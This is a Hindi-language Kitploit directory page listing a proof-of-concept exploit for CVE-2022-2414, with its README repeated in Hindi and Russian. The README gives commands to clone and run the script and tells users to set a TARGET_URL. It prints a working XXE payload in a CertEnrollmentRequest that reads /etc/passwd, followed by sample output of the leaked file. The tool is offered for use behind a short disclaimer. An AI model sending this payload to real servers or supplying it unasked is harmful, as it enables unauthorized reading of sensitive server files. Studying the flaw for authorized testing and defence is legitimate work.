Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-2414 — एक PoC स्क्रिप्ट है जो XML External Entity (XXE) भेद्यता के शोषण का प्रदर्शन करने के लिए है। | Kitploit
उपकरण/GitHubGitHub/geniuszly/cve-2022-2414
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubgeniuszly/cve-2022-2414

CVE-2022-2414

एक PoC स्क्रिप्ट है जो XML External Entity (XXE) भेद्यता के शोषण का प्रदर्शन करने के लिए है।

रिपॉजिटरी देखें
321 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

HI

GenXMLExternalEntityExploit एक PoC स्क्रिप्ट है जो XML External Entity (XXE) कमजोरियों के दोहन को प्रदर्शित करने के लिए है। यह स्क्रिप्ट लक्ष्य सर्वर से संवेदनशील फ़ाइलों को पढ़ने के लिए XML पेलोड का उपयोग करती है। यह सुरक्षा परीक्षण, पेनिट्रेशन परीक्षण या शैक्षिक उद्देश्यों के लिए उपयोगी हो सकता है।

विशेषताएं

  • एक निर्दिष्ट सर्वर पर तैयार XML पेलोड भेजता है।
  • सर्वर फ़ाइलों को पढ़ने के लिए XXE कमजोरियों का दोहन करता है।
  • आसानी से अनुकूलन योग्य लक्ष्य URL और पेलोड डेटा।

उपयोग कैसे करें

  1. रिपॉजिटरी को क्लोन करें
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2022-2414
    
  2. निर्देशिका में जाएं
    root@kitploit:~
    cd CVE-2022-2414
    
  3. स्क्रिप्ट चलाएं सुनिश्चित करें कि आपकी मशीन पर Python स्थापित है।
    root@kitploit:~
    python3 GenXMLExternalEntityExploit.py
    

कॉन्फ़िगरेशन

  • TARGET_URL: स्क्रिप्ट में TARGET_URL वेरिएबल को अपडेट करें ताकि वह उस लक्ष्य सर्वर को इंगित करे जिसे आप परीक्षण करना चाहते हैं।
  • XML_PAYLOAD: विशिष्ट फ़ाइल पथ या सर्वर-साइड ऑपरेशन के लिए स्क्रिप्ट में XML_PAYLOAD स्ट्रिंग को अनुकूलित करें।
  • HEADERS: आवश्यकतानुसार HTTP हेडर को संशोधित करें।
  • उदाहरण

    डिफ़ॉल्ट रूप से, स्क्रिप्ट /etc/passwd फ़ाइल को पढ़ने के लिए निम्नलिखित पेलोड का उपयोग करती है:

    root@kitploit:~
    <!--?xml version="1.0" ?-->
    <!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
    <CertEnrollmentRequest>
      <Attributes/>
      <ProfileID>&fetchFile;</ProfileID>
    </CertEnrollmentRequest>
    

    उदाहरण आउटपुट

    root@kitploit:~
    Инициализация отправки XML-пейлоада на сервер...
    Статус-код ответа: 200
    Содержимое XML-ответа:
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nологin
    ...
    

    अस्वीकरण

    यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। लेखक इस उपकरण के किसी भी अवैध उपयोग के लिए जिम्मेदार नहीं है।

    RU

    GenXMLExternalEntityExploit — это PoC скрипт для демонстрации эксплуатации уязвимости XML External Entity (XXE). Скрипт использует XML-пейлоад для чтения конфиденциальных файлов с целевого сервера. Может использоваться для тестирования безопасности, проведения пентестов или в образовательных целях.

    Функциональные возможности

    • Отправляет сформированный XML-пейлоад на указанный сервер.
    • Использует уязвимость XXE для чтения файлов на сервере.
    • Легко настраиваемые URL-адрес целевого сервера и содержимое пейлоада.

    Как использовать

    1. Клонируйте репозиторий
      root@kitploit:~
      git clone https://github.com/geniuszly/CVE-2022-2414
      
    2. Перейдите в директорию
      root@kitploit:~
      cd CVE-2022-2414
      
    3. Запустите скрипт Убедитесь, что у вас установлен Python.
      root@kitploit:~
      python3 GenXMLExternalEntityExploit.py
      

    Настройки

    • TARGET_URL: Измените переменную TARGET_URL в скрипте на URL-адрес сервера, который вы хотите протестировать.
    • XML_PAYLOAD: Настройте строку XML_PAYLOAD для указания конкретных файлов или операций на стороне сервера.
    • HEADERS: При необходимости измените HTTP-заголовки.

    Пример

    По умолчанию скрипт использует следующий пейлоад для чтения файла /etc/passwd:

    root@kitploit:~
    <!--?xml version="1.0" ?-->
    <!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
    <CertEnrollmentRequest>
      <Attributes/>
      <ProfileID>&fetchFile;</ProfileID>
    </CertEnrollmentRequest>
    

    Пример вывода

    root@kitploit:~
    Инициализация отправки XML-пейлоада на сервер...
    Статус-код ответа: 200
    Содержимое XML-ответа:
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nологin
    ...
    

    Отказ от ответственности

    Этот инструмент предназначен исключительно для образовательных целей и тестирования безопасности с разрешения. Автор не несет ответственности за любое незаконное использование данного инструмента.

    टूल डाउनलोड करें